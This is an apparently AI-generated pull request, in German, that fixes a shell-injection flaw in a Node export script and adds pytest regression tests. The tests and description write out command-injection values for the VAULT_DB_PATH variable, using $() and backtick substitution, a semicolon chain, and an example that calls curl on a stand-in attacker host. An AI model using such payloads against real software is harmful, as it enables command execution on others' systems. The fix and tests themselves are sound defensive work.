### PR TITLE
fix(security): Shell-Injection in export-literature-state.mjs via VAULT_DB_PATH (#218)

### DIFF
--- a/scripts/export-literature-state.mjs
+++ b/scripts/export-literature-state.mjs
@@ -15,7 +15,7 @@
  * Tool-Calls verwendet werden.
  */
 
-import { execSync } from "node:child_process";
+import { execFileSync } from "node:child_process";
 import { writeFileSync } from "node:fs";
 import { resolve } from "node:path";
 
@@ -33,14 +33,16 @@ const VAULT_DB = process.env.VAULT_DB_PATH ?? "vault.db";
 /**
  * Führt einen Python3-Einzeiler aus und gibt das geparste JSON-Ergebnis zurück.
  * Bei Fehler: gibt null zurück und loggt die Fehlermeldung.
+ *
+ * Sicherheit: Der Code und etwaige Argumente werden über das argv-Array an
+ * `python3` übergeben (execFileSync, KEINE Shell). Dadurch ist keine
+ * Shell-Interpolation möglich. Der Vault-Pfad fließt ausschließlich über die
+ * Environment-Variable VAULT_DB_PATH und wird im Python via os.environ gelesen
+ * — er wird nirgends in den Code-String interpoliert (#218).
  */
-function runPython(code) {
+function runPython(code, args = []) {
   try {
-    const escaped = code
-      .replace(/\\/g, "\\\\")
-      .replace(/"/g, '\\"')
-      .replace(/\n/g, "\\n");
-    const result = execSync(`python3 -c "${escaped}"`, {
+    const result = execFileSync("python3", ["-c", code, ...args], {
       env: { ...process.env, VAULT_DB_PATH: VAULT_DB },
       encoding: "utf-8",
       stdio: ["pipe", "pipe", "pipe"],
@@ -58,11 +60,11 @@ function runPython(code) {
  */
 function getAllPapers() {
   return runPython(`
-import sys, json
+import os, sys, json
 sys.path.insert(0, '.')
 try:
     from academic_vault.db import VaultDB
-    conn = VaultDB._open('${VAULT_DB.replace(/'/g, "\\'")}')
+    conn = VaultDB._open(os.environ['VAULT_DB_PATH'])
     rows = conn.execute(
         'SELECT paper_id, csl_json, pdf_path, file_id, type FROM papers ORDER BY added_at DESC'
     ).fetchall()
@@ -77,19 +79,22 @@ except Exception as e:
  * Gibt die Anzahl gespeicherter Zitate für ein Paper zurück.
  */
 function getQuoteCount(paperId) {
-  const safe = paperId.replace(/'/g, "\\'");
-  return runPython(`
-import sys, json
+  // paperId fließt über argv (sys.argv[1]) — keine Interpolation in den Code.
+  return runPython(
+    `
+import os, sys, json
 sys.path.insert(0, '.')
 try:
     from academic_vault.db import VaultDB
-    conn = VaultDB._open('${VAULT_DB.replace(/'/g, "\\'")}')
-    row = conn.execute('SELECT COUNT(*) AS cnt FROM quotes WHERE paper_id = ?', ('${safe}',)).fetchone()
+    conn = VaultDB._open(os.environ['VAULT_DB_PATH'])
+    row = conn.execute('SELECT COUNT(*) AS cnt FROM quotes WHERE paper_id = ?', (sys.argv[1],)).fetchone()
     conn.close()
     print(json.dumps(row['cnt'] if row else 0))
 except Exception as e:
     print(json.dumps(0))
-`);
+`,
+    [paperId]
+  );
 }
 
 /**

--- a/tests/test_export_literature_state_injection.py
+++ b/tests/test_export_literature_state_injection.py
@@ -1,0 +1,96 @@
+"""Regressionstest fuer Shell-Injection in scripts/export-literature-state.mjs (#218).
+
+Das Skript ruft Python via Node-Subprocess auf. Frueher wurde der Python-Code
+als String per ``python3 -c "<interpolierter Code>"`` an die Shell uebergeben,
+wobei ``VAULT_DB`` (aus ``VAULT_DB_PATH``) in den Code-String interpoliert und nur
+``\\``, ``"`` und ``\\n`` escaped wurden. Backtick und ``$()`` ueberstanden das
+Escaping und wurden von der Shell als Command Substitution ausgefuehrt.
+
+Dieser Test setzt ``VAULT_DB_PATH`` auf einen Payload mit ``$()``- und Backtick-
+Command-Substitution, die eine Sentinel-Datei anlegen wuerde, und verifiziert,
+dass diese Datei NICHT entsteht (kein injizierter Befehl wird ausgefuehrt).
+
+Gegen die verwundbare Version schlaegt der Test fehl (Sentinel wird angelegt),
+nach dem Fix ist er gruen.
+"""
+import os
+import shutil
+import subprocess
+import tempfile
+import uuid
+from pathlib import Path
+
+import pytest
+
+SCRIPT_PATH = Path(__file__).parent.parent / "scripts" / "export-literature-state.mjs"
+
+pytestmark = pytest.mark.skipif(
+    shutil.which("node") is None, reason="node nicht verfuegbar"
+)
+
+
+def _run_export(vault_db_path: str, cwd: Path) -> subprocess.CompletedProcess:
+    """Startet das Export-Skript als Node-Subprocess mit gesetztem VAULT_DB_PATH."""
+    env = os.environ.copy()
+    env["VAULT_DB_PATH"] = vault_db_path
+    return subprocess.run(
+        ["node", str(SCRIPT_PATH), "--output", str(cwd / "literature_state.md")],
+        cwd=str(cwd),
+        env=env,
+        capture_output=True,
+        text=True,
+        timeout=60,
+    )
+
+
+def test_vault_db_path_command_substitution_does_not_execute():
+    """Backtick/``$()``-Payload in VAULT_DB_PATH darf keinen Befehl ausfuehren."""
+    with tempfile.TemporaryDirectory() as tmp:
+        tmpdir = Path(tmp)
+        sentinel = tmpdir / f"PWNED_{uuid.uuid4().hex}"
+        assert not sentinel.exists()
+        # Sentinel-Pfad enthaelt keine Sonderzeichen (mktemp/TemporaryDirectory),
+        # damit der Payload nicht durch das (verwundbare) Escaping zerstoert wird.
+        assert "'" not in str(sentinel) and " " not in str(sentinel)
+
+        # Payload nutzt sowohl $() als auch Backtick-Command-Substitution.
+        payload = f"vault.db$(touch {sentinel})`touch {sentinel}`"
+
+        result = _run_export(payload, tmpdir)
+
+        assert not sentinel.exists(), (
+            "Shell-Injection: VAULT_DB_PATH-Payload hat einen Befehl ausgefuehrt "
+            f"(Sentinel {sentinel} wurde angelegt).\n"
+            f"stdout: {result.stdout}\nstderr: {result.stderr}"
+        )
+
+
+def test_vault_db_path_semicolon_payload_does_not_execute():
+    """Auch ein ``;``-getrennter Payload darf keinen Befehl ausfuehren."""
+    with tempfile.TemporaryDirectory() as tmp:
+        tmpdir = Path(tmp)
+        sentinel = tmpdir / f"PWNED_{uuid.uuid4().hex}"
+        assert not sentinel.exists()
+        assert "'" not in str(sentinel) and " " not in str(sentinel)
+
+        payload = f"/tmp/x; touch {sentinel}"
+
+        _run_export(payload, tmpdir)
+
+        assert not sentinel.exists(), (
+            "Shell-Injection: ;-getrennter VAULT_DB_PATH-Payload wurde ausgefuehrt "
+            f"(Sentinel {sentinel} wurde angelegt)."
+        )
+
+
+def test_node_syntax_check_passes():
+    """``node --check`` muss fuer das Skript gruen bleiben (CI-Spiegelung)."""
+    result = subprocess.run(
+        ["node", "--check", str(SCRIPT_PATH)],
+        capture_output=True,
+        text=True,
+        timeout=30,
+    )
+    assert result.returncode == 0, (
+        f"node --check fehlgeschlagen: {result.stderr}"
+    )


### PR DESCRIPTION
## Problem

`scripts/export-literature-state.mjs` baute den Python-Code per Template-Literal mit interpoliertem `VAULT_DB` (aus `process.env.VAULT_DB_PATH`) und uebergab ihn via ``execSync(`python3 -c "${escaped}"`)`` an die Shell. Das Escaping deckte nur `\`, `"` und `\n` ab — **Backtick und `$()` ueberstanden es und wurden als Command Substitution ausgefuehrt**. Ein Wert wie ``vault.db`; curl attacker.com; `` bzw. `vault.db$(touch …)` loeste reale Befehlsausfuehrung aus (CI oder bei extern gesetzter Env-Var).

## Fix (minimal, im Scope von #218)

- `execSync` -> `execFileSync("python3", ["-c", code, ...args])`: Code und Argumente fliessen ueber das **argv-Array** statt durch die Shell — keine Shell-Interpolation mehr, kein manuelles String-Escaping.
- Der Vault-Pfad wird **nicht mehr in den Code-String interpoliert**. Er fliesst ausschliesslich ueber die Environment-Variable `VAULT_DB_PATH` und wird im Python via `os.environ['VAULT_DB_PATH']` gelesen.
- `paperId` in `getQuoteCount` fliesst ueber `argv` (`sys.argv[1]`) statt interpoliert.

Beide Akzeptanzkriterien erfuellt: kein `python3 -c "<interpolierter String>"` mehr, Pfad ueber env; Regressionstest mit Backtick/`$()`-Payload.

## TDD-Beleg

Neuer Test `tests/test_export_literature_state_injection.py`:

- `test_vault_db_path_command_substitution_does_not_execute` — setzt `VAULT_DB_PATH` auf `vault.db$(touch <sentinel>)` + Backtick-Variante und prueft, dass die Sentinel-Datei NICHT entsteht.
- `test_vault_db_path_semicolon_payload_does_not_execute` — `;`-getrennter Payload.
- `test_node_syntax_check_passes` — spiegelt den CI-`node --check`.

Belege:
- **Vorher (verwundbare Version): ROT** — `test_vault_db_path_command_substitution_does_not_execute` schlug fehl, die Sentinel-Datei wurde durch den `$()`/Backtick-Payload angelegt (`AssertionError: Shell-Injection: VAULT_DB_PATH-Payload hat einen Befehl ausgefuehrt`).
- **Nachher (mit Fix): GRUEN** — `3 passed`.
- `node --check scripts/export-literature-state.mjs` bleibt gruen.

Lokal: `/Users/j65674/.academic-research/venv/bin/python -m pytest tests/test_export_literature_state_injection.py tests/test_hook_snapshot.py -q` -> `8 passed`.

Closes #218

🤖 Generated with [Claude Code](https://claude.com/claude-code)
